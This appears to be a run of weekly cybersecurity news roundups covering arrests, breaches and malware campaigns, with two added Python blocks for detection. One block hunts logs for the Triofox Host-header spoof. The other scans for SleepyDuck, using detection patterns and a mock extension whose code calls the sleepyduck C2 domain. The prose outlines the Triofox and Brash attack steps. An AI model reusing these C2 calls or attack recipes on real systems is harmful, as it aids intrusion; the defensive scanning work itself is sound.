
The Good, the Bad and the Ugly in Cybersecurity – Week 48

The Good | Poland Detains Russian Hacker Amid Rising Moscow-Linked Sabotage

Poland’s Central Bureau for Combating Cybercrime (CBZC) has arrested a Russian national in Kraków on suspicion of breaching the IT systems of local companies, marking the latest incident tied to what Warsaw describes as Russia’s expanding sabotage and espionage campaign across Europe. According to Polish Interior Minister Marcin Kierwiński, the suspect allegedly compromised corporate-level security defenses to access and manipulate company databases in ways that could have disrupted operations and endangered customers.

Source: RMF24

Investigators say the man illegally entered Poland in 2022 and later obtained refugee status. He was detained on November 16 by Polish authorities and has since been interrogated, charged, and placed in three months of pre-trial custody. Authorities also believe he may be connected to additional cyberattacks affecting firms in Poland and other EU states, and they are still determining the full scope of the damage.

The arrest comes amid heightened concern over Russian hybrid warfare since Moscow’s invasion of Ukraine in 2022. Poland has linked recent incidents, including sabotage of a railway line and a fire at a major shopping mall, to Russian intelligence activities. The country has shut down all Russian consulates following the events.

EU officials warn that cyberattacks against regional companies and institutions have surged, with many attributed to GRU-backed actors. Other recent disruptions have included payment service outages and leaks of customer data from Polish firms. In response, Polish Digital Affairs Minister Krzysztof Gawkowski plans to invest a record €930 million in bolstering the country’s cybersecurity, underscoring what authorities describe as the urgent need for stronger corporate defenses and deeper international cooperation against increasingly aggressive cyber threats.

The Bad | FBI Warns of Banking Fraud & Account Takeover Schemes Ahead of Holidays

The FBI has issued a PSA about a sharp rise in account takeover (ATO) fraud, with cybercriminals impersonating financial institutions to steal more than $262 million since January 2025. The agency’s Internet Crime Complaint Center (IC3) has received over 5,100 reports this year from individuals, businesses, and organizations across every sector.

The schemes start off with deceiving victims through texts, calls, and emails, posing as bank staff or customer support. They trick targets into revealing their login credentials, multi-factor authentication (MFA) codes, or one-time passcodes (OTPs). Criminals have also been luring victims onto phishing websites engineered to mimic legitimate banking or payroll sites, sometimes boosted through SEO poisoning to appear at the top of search results.

Once inside the victim’s account, fraudsters reset passwords, lock out the rightful owners, and quickly transfer funds into crypto-linked accounts, which makes recovery extremely difficult. Some victims report being manipulated with fabricated claims of fraudulent purchases, or even firearm transactions to incite panic, before being redirected to a second scammer impersonating law enforcement.

As we enter the holiday season, the FBI urges consumers and organizations to monitor their accounts closely, use strong unique passwords, enable MFA, verify URLs, and avoid visiting personal banking sites through search engine results. Victims should immediately contact their financial institutions to request recalls and provide indemnification documents, and then file detailed reports with IC3.

Officials and security experts stress that most ATO cases stem from compromised credentials. Stronger identity verification, such as phishing-resistant passwordless authentication, and manual verification steps for high-value transfers remain the basic hygiene needed to reduce these attacks.

The Ugly | OpenAI Alerts API Users After Mixpanel Breach Exposes Limited Data

OpenAI is alerting some ChatGPT API customers that limited personally identifiable information (PII) was exposed after its third-party analytics provider, Mixpanel, was breached. The compromise, stemming from a smishing campaign detected on November 8, affected “limited analytics data related to some users of the API”, but did not compromise ChatGPT or other OpenAI products.

OpenAI confirmed that credentials, API keys, API requests and usage data, payment details, chat contents, and government IDs were not exposed. The compromised analytics data, however, may include usernames, email addresses, approximate user location, browser and operating system details, referring websites, and account or organization IDs.

OpenAI said users do not need to reset passwords or regenerate API keys. Some users have reported that CoinTracker, a cryptocurrency tracking platform, may also have been affected, with limited device metadata and transaction counts exposed.

Has @mixpanel not disclosed this breach? Sent from @CoinTracker. pic.twitter.com/xk9nmGVmfm

— Daniel Harrison (@danielh9277) November 27, 2025

OpenAI has begun an investigation, removed Mixpanel from production services, and is notifying affected users directly. The company warns that the leaked data could be used for phishing or social engineering attacks and advises users to verify any messages claiming to relate to the incident, enable MFA, and to never share account credentials via email, text, or chat.

Mixpanel, in turn, has responded to the incident by securing accounts, revoking active sessions, rotating compromised credentials, blocking the threat actor’s IPs, resetting employee passwords, and implementing new controls to prevent future incidents. The analytics firm also reached out to all impacted customers directly.

The incident highlights the risks posed by third-party service providers and the importance of awareness against phishing, even when no core systems or highly sensitive information are directly compromised.

The Good, the Bad and the Ugly in Cybersecurity – Week 47

The Good | Courts Prosecute DPRK Fraud, Ransomware Hosting & Crypto Mixer Ops

Five people have pleaded guilty to helping the DPRK run illicit revenue schemes involving remote IT worker fraud and cryptocurrency theft. The group enabled North Korean operatives to obtain U.S. jobs using false or stolen identities, generating over $2.2 million while impacting 136 companies. The DOJ is also seeking forfeiture of $15 million tied to APT38 cyber-heists. The defendants, Oleksandr Didenko, Erick Prince, Audricus Phagnasay, Jason Salazar, and Alexander Travis, admitted to stealing U.S. identities for overseas workers and laundering stolen funds.

Authorities in the U.S., U.K., and Australia have issued coordinated sanctions against Russian bulletproof hosting (BPH) providers that enable ransomware groups by leasing servers for malware delivery, phishing attacks, and illicit content hosting. To help cybercriminals evade capture, BPH services ignore abuse reports and law enforcement takedown requests. OFAC has sanctioned Media Land, its sister companies, and three executives, all tied to LockBit, BlackSuit, Play, and other threat groups. Five Eyes agencies also released guidance to help ISPs detect and block malicious infrastructure used by BPH services.

Our 🆕 joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more 👉 https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

The founders of Samourai Wallet, a cryptocurrency mixing service, have been sentenced to prison for laundering over $237 million. Operating since 2015, Samourai used its ‘Whirlpool’ mixing system and ‘Ricochet’ multi-hop transactions to obscure Bitcoin flows. These features made tracing more difficult and enabled criminals involved in darknet markets, drug trafficking, and cybercrime to launder more than $2 billion. Authorities seized the platform, including its servers, domains, and mobile app, while the founders agreed to forfeit all traceable proceeds. CEO Keonne Rodriguez has received five years, while CTO William Lonergan Hill received four along with supervised release. The pair were ordered to pay fines of $250,000 each.

The Bad | DPRK Actors Build Fake Job Platform to Lure AI Talent & Push Malware

As part of their ongoing and evolving Contagious Interview campaign, DPRK-based threat actors have created a fake job platform designed to compromise legitimate job seekers, particularly in the AI research, software development, and cryptocurrency verticals. While earlier iterations of the campaign relied on approaching individuals directly through social media and recruiting platforms, the latest tactic weaponizes a fully functional hiring pipeline.

Researchers discovered the latest lure – a Next.js-based job portal hosted at lenvny[.]com, complete with dozens of fabricated AI and crypto-industry job listings. The listings mimic branding from major tech companies and feature a polished UI and full recruitment workflow that mirrors modern hiring systems, encouraging applicants to submit resumes and professional links before prompting them to record a video introduction.

This final step triggers the DPRK-favored ClickFix technique: When applicants copy the fake interview instructions, a hidden clipboard hijacker swaps their text with a multi-stage malware command. When pasted into a terminal, it downloads and executes staged payloads under the guise of a “driver update”, ultimately launching a VBScript-based loader. This design blends seamlessly with typical remote-work interview processes and dramatically increases the likelihood of accidental execution.

Error message with ClickFix message (Source: Validin)

The platform also performs strategic filtering, attracting AI and crypto professionals specifically, as their skills, network access, and workstations tend to align with DPRK’s intelligence and financial priorities, from model-training infrastructure to crypto exchange systems. The campaign reflects significant maturation in DPRK social engineering tradecraft, pairing high-fidelity UI design with covert malware delivery. Job seekers are advised to verify domains, avoid off-platform hiring systems, and execute any requested code only in sandboxed environments.

The Ugly | Iran-Backed Actors Weaponize Cyber Recon to Power Real-World Attacks

Iranian-linked threat actors are using cyber operations to support real-world military activity, a pattern described by researchers as “cyber-enabled kinetic targeting”.

In the past, conventional security models separated the cyber and physical domains, a delineation that is proving artificial in today’s socioeconomic and political climate. These are no longer just cyber incidents that happen to cause physical impact, but coordinated campaigns in which digital operations are built to advance military objectives.

One example involves Crimson Sandstorm (aka Tortoiseshell and TA456), a group tied to Iran’s Islamic Revolutionary Guard Corps (IRGC). Between December 2021 and January 2024, the group probed a ship’s Automatic Identification System (AIS) before expanding their operations to other maritime platforms. On January 27, 2024, the group searched for AIS location data on one particular shipping vessel. Days later, that same ship was targeted in an unsuccessful missile strike by Iranian-backed Houthi forces, which have mounted repeated missile attacks on commercial shipping in the Red Sea amid the Israel–Hamas conflict.

A second case highlights Mango Sandstorm (aka Seedworm and TA450), a group affiliated with Iran’s Ministry of Intelligence and Security (MOIS). In May, the group set up infrastructure for cyber operations and gained access to compromised CCTV feeds in Jerusalem to gather real-time visual intelligence. Just a month later, the Israel National Cyber Directorate confirmed Iranian attempts to access cameras during large-scale attacks, reportedly to get feedback on where the missiles hit and improve precision. Both highlighted cases show the attackers’ reliance on routing traffic through anonymizing VPNs to prevent attribution.

The divide between digital intrusions and physical warfare continues to blur. With nation state groups leveraging cyber reconnaissance as a precursor for physical attacks, it is likely we will continue to see significant developments in this kind of hybrid warfare.

The Good, the Bad and the Ugly in Cybersecurity – Week 46

The Good | FBI and Europol Arrest Ransomware Broker and Dismantle Major Botnet

Russian national Aleksey Olegovich Volkov is set to plead guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks targeting at least eight U.S. companies from July 2021 to November 2022.

Using aliases like “chubaka.kor” and “nets”, Volkov breached victims’ corporate networks and sold that access to the ransomware group, whose ransom demands ranged from $300,000 to $15 million in Bitcoin. FBI investigators traced Volkov through iCloud, cryptocurrency records, and social media, recovering chat logs, stolen credentials, and evidence of ransom negotiations, all of which linked him to $1.5 million in collected payments.

His breaches affected companies across multiple states, including banks, engineering firms, and telecoms. Volkov faces up to 53 years in prison and over $9.1 million in restitution for charges including trafficking in access, identity theft, computer fraud, and money laundering.

Law enforcement agencies across several countries dismantled over 1,000 servers linked to the Rhadamanthys infostealer, VenomRAT, and the Elysium botnet as part of Operation Endgame, an international effort against cybercrime. Coordinated by Europol and Eurojust with support from private partners, the action consisted of searches at 11 locations in Germany, Greece, and the Netherlands, where officers seized 20 domains and arrested a key VenomRAT suspect.

The disrupted infrastructure involved hundreds of thousands of infected devices and millions of stolen credentials, including access to over 100,000 crypto wallets. Rhadamanthys, active since 2023, had seen rapid growth in late 2025, affecting thousands of IP addresses daily.

Authorities recommend checking systems for infection via politie.nl/checkyourhack and haveibeenpwned.com. Operation Endgame has previously disrupted numerous malware and ransomware networks, including Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, highlighting ongoing international efforts to curb cybercrime.

The Bad | UNC6485 Exploits Triofox Vulnerability for Remote Code Execution

Threat actors have exploited a critical vulnerability in Gladinet’s Triofox file sharing and remote access platform, chaining it with the product’s built-in antivirus scanner to gain SYSTEM-level remote code execution (RCE).

The vulnerability, tracked as CVE-2025-12480, allows attackers to abuse an access control logic error that grants admin privileges when the request host equals ‘localhost’. By spoofing this value in the HTTP host header, an attacker can reach sensitive setup pages without credentials, especially on systems where the TrustedHostIp parameter was never configured.

Security researchers first discovered an intrusion in August targeting a Triofox instance running version 16.4.10317.56372. They later determined that the threat cluster UNC6485 used a malicious HTTP GET request containing a localhost header to access the AdminDatabase.aspx setup page.

Using this workflow, the attackers created a rogue administrator account called ‘Cluster Admin’, uploaded a malicious script, and configured Triofox to treat that script as the antivirus scanner path. Since the scanner inherits SYSTEM-level privileges from the parent process, this allowed the attackers to execute arbitrary code.

Source: Google Threat Intelligence Group

The payload then launches a PowerShell downloader to retrieve a Zoho UEMS installer, which subsequently deploys Zoho Assist and AnyDesk on the compromised host for remote access and lateral movement. The attackers were also observed using Plink and PuTTY to establish SSH tunnels and forward traffic to the compromised host’s RDP port.

Gladinet has since fixed CVE-2025-12480 in Triofox version 16.7.10368.56560, and administrators are urged to update to the latest release (16.10.10408.56683), review admin accounts, and ensure the antivirus engine is not configured to run unauthorized binaries.
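The chain above turns on one decision: trusting the client-supplied Host header to decide who counts as local. The following is an added example, not Gladinet’s code (Triofox is a .NET application and its real checks are not reproduced here). It reconstructs the flawed pattern beside a hardened one that decides on the TCP peer address instead, and then hunts IIS-style W3C logs for the access pattern the report describes: setup-page requests whose Host header says localhost but whose client IP is not loopback. The function names, the handling of TrustedHostIp, and the log excerpt are assumptions constructed for illustration.

```python
"""Analogue of the CVE-2025-12480 logic error plus a log hunt for its abuse.

Added example: not Gladinet's code. Function names, TrustedHostIp handling and
the IIS-style log lines are assumptions constructed to illustrate the pattern.
"""
import ipaddress
from typing import Dict, List, Optional

LOOPBACK = {ipaddress.ip_address("127.0.0.1"), ipaddress.ip_address("::1")}
SETUP_PAGES = {"/AdminDatabase.aspx"}  # setup page named in the intrusion report


def vulnerable_setup_allowed(host_header: str, peer_ip: str,
                             trusted_host_ip: Optional[str]) -> bool:
    """Flawed pattern: grant the setup pages when the *Host header* says localhost.

    The Host header is attacker-controlled, so any remote client can send
    'Host: localhost' and pass. Hypothetical reconstruction of the logic error.
    """
    if trusted_host_ip and peer_ip == trusted_host_ip:
        return True
    return host_header.split(":")[0].strip().lower() == "localhost"


def hardened_setup_allowed(host_header: str, peer_ip: str,
                           trusted_host_ip: Optional[str]) -> bool:
    """Fixed pattern: decide on the TCP peer address, which a directly connected
    client cannot forge, and ignore the Host header entirely."""
    try:
        peer = ipaddress.ip_address(peer_ip)
        trusted = ipaddress.ip_address(trusted_host_ip) if trusted_host_ip else None
    except ValueError:
        return False  # garbage in the address fields never grants access
    return peer in LOOPBACK or (trusted is not None and peer == trusted)


# Constructed W3C log excerpt with the optional cs-host field enabled. Triofox is
# an ASP.NET application, so IIS logs are a plausible source (assumption).
SAMPLE_IIS_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-host sc-status
2025-08-11 02:14:07 10.0.0.8 GET /portal/index.aspx triofox.example.net 200
2025-08-11 02:14:09 198.51.100.23 GET /AdminDatabase.aspx localhost 200
2025-08-11 02:14:10 127.0.0.1 GET /AdminDatabase.aspx localhost 200
2025-08-11 02:15:44 198.51.100.23 POST /AdminDatabase.aspx localhost 302
"""


def hunt_spoofed_localhost(log_text: str) -> List[Dict[str, str]]:
    """Return setup-page requests whose Host header claims localhost while the
    client address is not loopback: the signature of the access described above."""
    fields: List[str] = []
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the W3C header names the columns
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem") not in SETUP_PAGES:
            continue
        host = rec.get("cs-host", "").split(":")[0].lower()
        try:
            peer = ipaddress.ip_address(rec.get("c-ip", ""))
        except ValueError:
            continue
        if host == "localhost" and peer not in LOOPBACK:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in hunt_spoofed_localhost(SAMPLE_IIS_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-method"], hit["cs-uri-stem"])
```

Two caveats when applying the hunt to real logs: cs-host is not logged by IIS unless the field is enabled, so confirm it is present before relying on this query; and behind a reverse proxy the peer address is the proxy’s, so the hardened check has to be extended with an explicit trusted-proxy list rather than falling back to the Host header.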

The Ugly | Attackers Exploit Zero-Day to Steal Washington Post Employee Data

The Washington Post, one of the organizations impacted by the data theft campaign targeting Oracle software, is notifying nearly 10,000 current and former employees and contractors that their personal and financial information has been exposed.

The Post, one of the largest U.S. newspapers with 2.5 million digital subscribers, confirmed that attackers accessed parts of its network between July 10 and August 22 by exploiting a previously unknown zero-day vulnerability in Oracle E-Business Suite, the organization’s internal enterprise resource planning (ERP) system. The vulnerability is tracked as CVE-2025-61884.

According to the letter sent to affected individuals, the Post learned of the intrusion after a threat actor contacted the company on September 29 claiming access to its Oracle applications. Post-breach investigations identified the widespread flaw that allowed the attackers to access many Oracle customers’ applications. The attackers used this flaw to steal sensitive data and later attempted to extort the Post and other organizations breached in the same campaign.

Although the Post did not name the group responsible, the Cl0p ransomware operation is suspected to be behind the attacks. Other high-profile victims of the same Oracle zero-day include Harvard University, Envoy Air, and GlobalLogic, with additional impacted organizations listed on Cl0p’s leak site.

The Post’s investigation has determined that data belonging to 9,720 individuals was compromised. Exposed information includes full names, Social Security numbers, tax and ID numbers, and bank account and routing numbers. Impacted individuals have been offered 12 months of free identity protection through IDX and advised to place credit freezes on their accounts and fraud alerts for additional protection.

The Good, the Bad and the Ugly in Cybersecurity – Week 45

The Good | Authorities Crack Down on Ransomware, Crypto Fraud & DPRK Laundering Ops

Three ex-employees of cybersecurity firms DigitalMint and Sygnia have been indicted for participating in BlackCat (aka ALPHV) ransomware attacks on five U.S. companies between May and November 2023.

The defendants allegedly acted as BlackCat affiliates, breaching networks, stealing data, deploying encryption malware, and demanding cryptocurrency ransoms. Victims included medical, pharmaceutical, and engineering firms. Prosecutors say the ransom demands ranged from $300,000 to $10 million, with one company paying out $1.27 million. The trio faces up to 50 years each in prison if convicted.

Also this week, the U.S. Treasury sanctioned two North Korean financial institutions and eight individuals for laundering cryptocurrency stolen via fraudulent IT worker schemes. Those designated include Ryujong Credit Bank and Korea Mangyongdae Computer Technology Company (KMCTC), along with executives and bankers responsible for managing funds linked to ransomware attacks and UN sanctions violations.

OFAC says that over the last three years DPRK-affiliated cybercriminals have stolen more than $3 billion in cryptocurrency using malware and social engineering. The sanctions freeze U.S. assets and warn that transactions with these entities risk secondary penalties.

In Europe, authorities have arrested nine suspects involved in a cryptocurrency fraud network responsible for stealing over €600 million ($689 million) across multiple countries. The criminals allegedly created fake crypto investment platforms that promised high returns and recruited victims through social media, cold calls, and fake endorsements from celebrity investors. Victims lost their funds while the suspects laundered the stolen assets using blockchain tools. In operations coordinated by Eurojust in Cyprus, Spain, and Germany, law enforcement seized cash, crypto, and bank accounts.

The Bad | SleepyDuck Trojan Exploits Ethereum Smart Contracts to Evade Takedown

A new remote access trojan (RAT) dubbed ‘SleepyDuck’ has been masquerading as a widely used Solidity extension on the Open VSX open-source registry, researchers say. The malware uses Ethereum smart contracts to manage its command and control (C2) communications, helping it maintain persistence even if its main server is taken down.

Initially benign when published on October 31, the infected extension, juan-bianco.solidity-vlang, became malicious after an update made the following day, by which time it had already been downloaded 14,000 times. For now, the extension remains available on Open VSX with a public warning. In total, it has been downloaded over 53,000 times.

Solidity VSCode warning (Source: Secure Annex)

Security researchers report that SleepyDuck activates when the code editor starts, a Solidity file opens, or when a compile command runs. It disguises its malicious activity through a fake webpack.init() function from extension.js, while secretly executing payloads that collect system information such as hostnames, usernames, MAC addresses, and timezones.

After it is triggered, the trojan tests several Ethereum RPC providers, picks the fastest, reads its C2 details from the smart contract, and enters a polling loop for new instructions. This blockchain-based C2 redundancy means that even if the main C2 domain (sleepyduck[.]xyz) is disabled, the malware can still fetch updated addresses or commands from the blockchain, making takedown efforts much more difficult.

In response, Open VSX has introduced new security measures, including shorter token lifetimes, automated scans, revoking any leaked credentials, and working in coordination with VS Code to block emerging threats. Best practices for developers include verifying extension publishers and installing software only from trusted repositories to avoid supply-chain compromises.
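Because the extension was benign at publication and turned malicious with a later update, publisher verification alone would not have caught it; an inventory check of what is actually installed is the practical complement. The script below is an added example, not code from Secure Annex or Open VSX. It scans an extensions directory for the indicators the text gives (the extension id juan-bianco.solidity-vlang, the sleepyduck[.]xyz C2 domain, the fake webpack.init() wrapper, and broad activation on editor start or Solidity files). Treating the Ethereum JSON-RPC method name eth_call as a blockchain-C2 indicator is an assumption, and the fixture built by build_sample_extensions() is constructed so the scan runs offline.

```python
"""Inventory installed VS Code / Open VSX extensions for SleepyDuck indicators.

Added example, not from Secure Annex or Open VSX. 'eth_call' as an indicator is
an assumption; the fixture directory is constructed for offline runs.
"""
import json
import pathlib
import re
import tempfile
from typing import Dict, List

MALICIOUS_IDS = {"juan-bianco.solidity-vlang"}
CONTENT_INDICATORS = {
    "sleepyduck C2 domain": re.compile(r"sleepyduck\.xyz", re.I),
    "fake webpack.init() wrapper": re.compile(r"webpack\.init\s*\("),
    "eth_call JSON-RPC method (assumed C2 lookup)": re.compile(r"\beth_call\b"),
}
BROAD_ACTIVATION = {"*", "onStartupFinished", "onLanguage:solidity"}


def scan_extensions(root: pathlib.Path) -> Dict[str, List[str]]:
    """Map extension id -> reasons it looks suspicious; clean extensions are omitted."""
    findings: Dict[str, List[str]] = {}
    for pkg in sorted(root.glob("*/package.json")):
        try:
            meta = json.loads(pkg.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        ext_id = f"{meta.get('publisher', '')}.{meta.get('name', '')}".lower()
        reasons: List[str] = []
        if ext_id in MALICIOUS_IDS:
            reasons.append("known malicious extension id")
        broad = BROAD_ACTIVATION.intersection(meta.get("activationEvents", []))
        if broad:  # only a hint: many legitimate extensions activate broadly
            reasons.append(f"broad activation: {', '.join(sorted(broad))}")
        for js in sorted(pkg.parent.rglob("*.js")):
            text = js.read_text(encoding="utf-8", errors="ignore")
            for label, pattern in CONTENT_INDICATORS.items():
                if pattern.search(text):
                    reasons.append(f"{label} in {js.relative_to(pkg.parent)}")
        # Report only extensions with a hard indicator, not activation alone.
        if any(not r.startswith("broad activation") for r in reasons):
            findings[ext_id] = reasons
    return findings


def build_sample_extensions() -> pathlib.Path:
    """Create a constructed extensions directory: one benign, one mimicking SleepyDuck."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="ext-scan-"))
    benign = root / "example.hello-world-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps({
        "publisher": "example", "name": "hello-world",
        "activationEvents": ["onCommand:hello.world"]}))
    (benign / "extension.js").write_text("exports.activate = () => console.log('hi');\n")

    bad = root / "juan-bianco.solidity-vlang-0.0.8"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps({
        "publisher": "juan-bianco", "name": "solidity-vlang",
        "activationEvents": ["*", "onLanguage:solidity"]}))
    # Constructed stand-in for the loader: strings only, never executed here.
    (bad / "extension.js").write_text(
        "const webpack = { init: () => fetch('https://sleepyduck.xyz/'),\n"
        "  rpc: JSON.stringify({method: 'eth_call', params: []}) };\n"
        "webpack.init();\n")
    return root


if __name__ == "__main__":
    for ext_id, reasons in scan_extensions(build_sample_extensions()).items():
        print(ext_id)
        for reason in reasons:
            print("  -", reason)
```

Point scan_extensions() at ~/.vscode/extensions (or the equivalent directory for VSCodium and other Open VSX clients) to run it against a real workstation; the indicator list is deliberately small and tied to what the report published, so extend CONTENT_INDICATORS as new details become available rather than treating an empty result as proof of a clean machine.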

The Ugly | Iran-Based Actors Target U.S. Policy Experts in New Espionage Campaign

Between June and August, a newly identified threat cluster dubbed ‘UNK_SmudgedSerpent’ launched a series of targeted cyberattacks against U.S.-based academics and foreign policy experts focused on the Middle East. The campaign, coinciding with rising Iran-Israel tensions, uses politically-themed lures related to Iranian domestic affairs and the militarization of the Islamic Revolutionary Guard Corps (IRGC).

Researchers say the threat actors behind the campaign initiated attacks with benign email exchanges before introducing phishing links impersonating prominent U.S. foreign policy figures and think tank institutions like the Brookings Institution and Washington Institute.

The targeted victims, over 20 U.S.-based experts on Iran-related policy, were enticed to open malicious meeting documents and login pages designed to harvest their Microsoft account credentials. In some attacks, the attackers sent URLs leading to fake MS Teams login pages but pivoted to spoofed OnlyOffice sites if the victim grew suspicious.

Example of UNK_smudgedserpent phishing email (Source: Proofpoint)

Clicking the links led to the download of malicious MSI installers disguised as Microsoft Teams, which then deployed legitimate remote monitoring and management (RMM) software like PDQ Connect. Subsequent activity suggests attackers manually installed additional tools such as ISL Online, indicating possible hands-on-keyboard intrusion.

Researchers note that the operation’s tactics mirror those of known Iranian cyberespionage groups such as TA455 (aka UNC1549, Smoke Sandstorm), TA453 (aka TunnelVision, APT 35, UNC788), and TA450 (aka TEMP.Zagros).

The researchers believe UNK_SmudgedSerpent’s campaigns are part of a broader collection effort by Iranian intelligence aimed at gathering insights from Western experts on regional policy, academic analyses, and strategic technologies.

The Good, the Bad and the Ugly in Cybersecurity – Week 44

The Good | Former GM of DoD Contractor Pleads Guilty to Selling U.S. Cyber Secrets

Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. federal court to two counts of stealing and selling classified cybersecurity tools and trade secrets to a Russian exploit broker.

Between 2022 and 2025, Williams stole at least eight restricted cyber-exploit components that were developed for the U.S. government and select allied partners. The DoJ stated that these tools, valued at $35 million, were part of Trenchant’s sensitive research and were never intended for foreign sale. Williams sold them for at least $1.3 million in cryptocurrency, signing formal contracts with the Russian intermediary for the initial sale of the components as well as a promise to provide follow-on technical support. Williams used the illicit proceeds to purchase luxury items, according to court filings.

Trenchant, L3Harris Technologies’ cyber capabilities arm, develops advanced offensive and defensive tools used by government agencies within the Five Eyes intelligence alliance. According to the DoJ, Williams abused his privileged access at Trenchant Systems to siphon the data, giving various customers of the broker, including the Russian government and other foreign cyber threat actors, an edge in targeting U.S. citizens, businesses, and critical infrastructure.

While the court reports did not name the broker, prior reporting suggests it may be Operation Zero, a Russian platform known for buying and reselling zero-day exploits, often rewarding developers with large cryptocurrency payouts.

Source: X via CyberScoop

Williams now faces up to 10 years in prison and fines of $250,000 or twice the profit gained. As exploit brokers increasingly operate as international arms dealers, law enforcement officials reaffirm their hard stance against malicious insiders abusing their positions of trust.

The Bad | New “Brash” Flaw Crashes Chromium Browsers with Timed Attacks

Security researcher Jose Pino has disclosed a severe vulnerability in Chromium’s Blink rendering engine that allows attackers to crash Chromium-based browsers within seconds. Pino has named the vulnerability “Brash” and attributes it to an architectural oversight: updates to the document.title API are not rate-limited. Without rate limiting, an attacker can generate millions of document object model (DOM) mutations per second by repeatedly changing the page title, overwhelming the browser and consuming CPU until the UI thread becomes unresponsive.

Source: GitHub

The Brash exploit occurs in three phases. First, the attacker prepares a hash seed by loading 100 unique 512-character hexadecimal strings into memory to vary title updates and maximize the impact of the attack. Then, the attacker launches burst injections that perform three consecutive document.title updates in a row, which in default test settings inject roughly 24 million updates per second using a burst size of 8,000 and a 1 ms interval. Lastly, the sustained stream of updates saturates the browser’s main thread, forcing both the tab and the browser to hang or crash and requiring forced termination.

Brash can be scheduled to run at precise moments, enabling a logic-bomb style attack that remains dormant until a timed trigger activates. This increases the danger since attackers can control when the large-scale disruption will occur. Hypothetically, a single click on a specially crafted URL can detonate the attack with millisecond accuracy and little initial indication.

The vulnerability affects Google Chrome and all Chromium-based browsers, including Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, OpenAI ChatGPT Atlas, and Perplexity Comet. Browsers built on other engines are not vulnerable to Brash: Mozilla Firefox (Gecko), Apple Safari (WebKit), and all third-party iOS browsers, which are required to use WebKit.

The Ugly | Hacktivists Manipulate Canadian Industrial Systems, Triggering Safety Risks

The Canadian Centre for Cyber Security has issued a warning that hacktivists have breached multiple critical infrastructure systems across Canada, altering industrial controls in ways that could have created dangerous conditions. The alert highlights rising malicious activity that targets internet-exposed Industrial Control Systems (ICS) and urges firms to shore up their security measures to prevent such attacks.

The bulletin cites three recent incidents. In the first, a water treatment facility experienced tampering with water pressure controls, degrading service for the local community. Following that, a Canadian oil and gas company had its Automated Tank Gauge (ATG) manipulated, triggering false alarms. In a third breach, a grain drying silo on a farm had temperature and humidity settings altered, creating potentially unsafe conditions if the changes had gone undetected.

Authorities believe these attacks were opportunistic rather than technically sophisticated, and intended to attract media attention, undermine public trust, and harm the reputation of Canadian authorities. Hacktivists have been known to collaborate with advanced persistent threat (APT) groups to amplify the reach of disruptive acts and cause public unrest.

Although none of the targeted facilities suffered damage, the incidents underline inherent risks in poorly protected ICS, including programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, human-machine interfaces (HMIs), and industrial IoT devices.

The Cyber Centre recommends that organizations inventory and secure internet-accessible ICS devices, remove direct internet exposure where possible, implement VPNs with multi-factor authentication (MFA), maintain regular firmware updates, and conduct regular penetration testing. Resources like the Cyber Security Readiness Goals (CRGs) offer guidance for critical infrastructure firms, and officials remind organizations to report suspicious activity via My Cyber Portal or to local authorities to reduce the risk of future compromise.

Source: Canadian Centre for Cyber Security

The Good, the Bad and the Ugly in Cybersecurity – Week 43

The Good | Europol Dismantles Global SIM-Box Fraud Network

Europol has dismantled a major cybercrime-as-a-service (CaaS) operation, codenamed SIMCARTEL, that powered over 3,200 fraud cases and caused at least €4.5 million in damages. The network operated 1,200 SIM-box devices containing some 40,000 SIM cards, enabling criminals to rent phone numbers registered to individuals in more than 80 countries. These were then used to create 49 million fraudulent online accounts for crimes including phishing, investment fraud, extortion, impersonation, and migrant smuggling.

The illegal service, run through gogetsms.com and apisim.com, worked by selling access to “fast and secure temporary” phone numbers marketed for anonymous communication and account verification. GoGetSMS also offered users a way to monetize their own SIM cards. However, reviews suggested it was a front for large-scale identity fraud, now exposed as one of Europe’s most extensive SIM-box schemes to date. Europol said the infrastructure was “technically highly sophisticated”, which allowed perpetrators worldwide to hide their identities while conducting telecom-based fraud.

After running coordinated raids across Austria, Estonia, Finland, and Latvia, police arrested seven suspects in total. They also seized five servers, the two websites, hundreds of thousands of SIM cards, €431,000 deposited in bank accounts, €266,000 in crypto, and four luxury vehicles. Both domains have been taken down and now display official law enforcement banners.

Confiscated SIM cards (Source: Europol)

So far, authorities have linked the network to 1,700 fraud cases in Austria and 1,500 in Latvia, with combined losses adding up to nearly €5 million. Europol’s forensic analysis of the seized servers aims to identify customers of the illegal service.

The Bad | Jingle Thief Exploits Cloud Identities for Large-Scale Gift Card Fraud

A new report from security researchers details the activities of ‘Jingle Thief’, a financially motivated threat group that operates almost entirely in cloud environments to conduct large-scale gift card fraud. Active since at least 2021, the group targets retail and consumer services organizations through phishing and smishing campaigns designed to steal Microsoft 365 credentials.

Credential phishing via smishing from the attacker’s infrastructure (Source: Unit 42)

Once inside, the attackers use the organization’s own cloud services to impersonate legitimate users, reach sensitive data, and manipulate gift card issuance systems. Their campaigns focus on mapping the cloud environment so they can move laterally across accounts, while staying quiet through tactics such as creating inbox rules, forwarding email, and registering rogue authenticator apps to bypass MFA in M365.

Unlike traditional malware-driven attacks, Jingle Thief relies heavily on identity misuse, choosing to leverage stolen credentials instead of deploying custom payloads to blend in with normal user activity. This approach allows them to maintain access for many months while issuing or selling unauthorized gift cards for profit on gray markets.

